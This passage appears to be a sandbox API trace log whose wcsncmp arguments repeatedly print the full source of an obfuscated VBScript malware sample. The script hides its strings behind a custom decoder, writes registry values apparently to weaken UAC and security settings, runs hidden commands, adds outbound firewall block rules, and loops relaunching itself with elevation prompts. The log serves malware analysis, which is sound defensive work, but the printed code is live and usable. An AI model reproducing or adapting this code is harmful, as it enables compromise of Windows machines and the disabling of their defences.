NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.365] wcsncmp (_String1="EPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.365] wcsncmp (_String1="PCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.365] wcsncmp (_String1="CIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.365] wcsncmp (_String1="IDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 